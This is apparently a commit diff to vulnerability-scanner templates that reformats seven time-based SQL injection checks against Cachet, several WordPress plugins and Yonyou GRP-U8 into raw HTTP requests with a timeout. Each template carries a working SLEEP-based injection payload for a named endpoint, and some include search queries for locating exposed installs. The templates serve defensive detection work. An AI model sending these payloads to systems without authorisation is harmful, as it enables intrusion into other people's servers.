updated template format for sqli templates with timeout

http/cves/2021/CVE-2021-39165.yaml

@@ -34,9 +34,11 @@ info:
   tags: cve,cve2021,cachet,sqli,chachethq
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1
+        Host: {{Hostname}}
 
     redirects: true
     max-redirects: 2

http/cves/2023/CVE-2023-6360.yaml

@@ -31,22 +31,26 @@ info:
     framework: wordpress
     fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"'
   tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar,joedolson
+
 flow: http(1) && http(2)
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt"
+  - raw:
+      - |
+        GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: word
         internal: true
         words:
           - 'My Calendar'
 
-  - method: GET
-    path:
-      - "{{BaseURL}}/?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl

http/cves/2023/CVE-2023-6567.yaml

@@ -33,9 +33,11 @@ info:
   tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl

http/cves/2024/CVE-2024-1061.yaml

@@ -34,9 +34,11 @@ info:
   tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl

http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml

@@ -15,9 +15,11 @@ info:
   tags: wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl

http/vulnerabilities/wordpress/wp-statistics-sqli.yaml

@@ -17,17 +17,30 @@ info:
     publicwww-query: /wp-content/plugins/wp-statistics/
   tags: sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp
 
+flow: http(1) && http(2)
+
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a)"
-      - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt"
+  - raw:
+      - |
+        GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        words:
+          - 'WP Statistics'
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 20s
+        GET /wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a) HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
           - 'duration>=6'
-          - 'contains(content_type, "text/html") && contains(body_2, "WP Statistics")'
           - 'status_code == 500'
         condition: and
 

http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml

@@ -15,13 +15,24 @@ info:
     fofa-query: icon_hash="-299520369"
   tags: yonyou,grp,sqli
 
+flow: http(1) && http(2)
+
+
 http:
   - raw:
       - |
         GET /login.jsp HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
+
+    matchers:
+      - type: word
+        words:
+          - 'GRP-U8'
+        internal: true
+
+  - raw:
       - |
+        @timeout: 20s
         POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
@@ -32,8 +43,7 @@ http:
       - type: dsl
         dsl:
           - 'duration_2>=6'
-          - 'status_code == 200'
-          - 'contains(content_type_2, "text/html") && contains(body_1, "GRP-U8")'
+          - 'contains(content_type, "text/html")'
         condition: and
 
 # digest: 4a0a00473045022100ff26707ab7b707eb63657075468f8fb5c9be2587a852c61a038cd6e74f11d80902201a654b27bab1bfb591f1d1cfd0517a439d2b61b67636eff6fac15f5091503614:922c64590222798bb761d5b6d8e72950